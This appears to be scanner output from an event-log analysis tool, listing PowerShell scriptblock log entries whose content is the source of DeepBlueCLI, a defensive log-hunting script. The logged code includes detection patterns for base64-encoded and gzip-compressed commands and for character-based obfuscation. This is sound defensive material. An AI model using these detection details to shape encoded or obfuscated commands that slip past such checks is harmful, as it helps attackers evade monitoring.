$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.021 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.024 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.029 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:05.032 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.017 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.017 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.018 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.019 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.046 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.048 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:18.049 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:43:19.155 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.122 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:44:35.127 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically 
triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. 
(Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. 
$servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. 
$output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $output += $eventxml.Event.EventData.Data[4].""#text"" $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" 
+ $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 